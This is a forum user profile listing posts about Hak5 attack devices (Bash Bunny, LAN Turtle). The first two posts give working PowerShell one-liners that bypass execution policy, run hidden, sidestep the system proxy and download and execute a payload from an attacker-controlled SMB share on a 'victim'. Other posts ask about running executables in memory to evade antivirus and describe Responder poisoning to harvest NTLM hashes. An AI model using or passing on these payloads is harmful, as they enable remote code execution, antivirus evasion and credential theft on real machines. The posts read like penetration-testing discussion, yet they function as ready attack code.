About cyb3rwr3ck
  1. And this is it (works, according to a quick test): powershell -exec Bypass -noP "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {$p = [System.Net.WebProxy]::GetDefaultProxy(); $p.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; [System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); $w=(New-Object System.Net.WebClient).DownloadString('\\<BB_IN_HERE>\p.txt'); [System.Net.GlobalProxySelection]::Select = $p; IEX $w;exit}}" Store default proxy + Creds to $p Clear pr
  2. Alright, had some time to check this out during the weekend. Invoke-Webrequest: The -NoProxy option seems to be part of PS >= v. 6, so it's not reliably found on the victim in any way. This is how it should look if we want to first check an SMB share for connectivity and then download/execute a payload from it without using the system-wide proxy in case of PS >= v6: powershell -exec Bypass -noP -WindowsStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOS
  3. The thing is that the bunny presents a Network to the Host during this kind of "bring your own network attack". So the proxy is utilized as long as there is no "direct" exception for exactly this bunny network configuration. This will create a connect request to the explicit proxy which dies... The only thing that should fix this behavior is enforcing this kind of direct request which - in an enterprise setup - is usually done by pac files. I have no idea how to do it temporarily using powershell so this is the goal to achieve.
  4. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system-wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads do not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests, which is the powershell default. I am currently unaware of a good solution to circumv
  5. Has anybody already tried to convert the .exe to a string and run it in-memory via powershell to get rid of the AV problem?
  6. I can confirm that ufw - which is part of Linux Mint 18 - also prevents me from running wp6.sh without locking down my connections. A "service ufw stop" before running the script, or in the "connectsaved" function, fixes the problem. @PaulFinch: Would you mind adding your code to github or to this post? This might help others with the same problem without researching it first...
  7. Hmmm, I am facing the same issue. Factory reset of the turtle, opkg update, then configuration of the quickcreds module using the turtle shell. The log folders I see in the /etc/turtle/Responder/logs folder are linked to /root/loot as they should be, but there is nothing in them. On the wire I can see that the poisoning is working and Windows is using the faked proxy which is asking for NTLM authentication. Anyway, no hashes are dumped to the turtle. I have tested the setup with a domain-joined Win 7 Pro and a stand-alone Win 10 Home.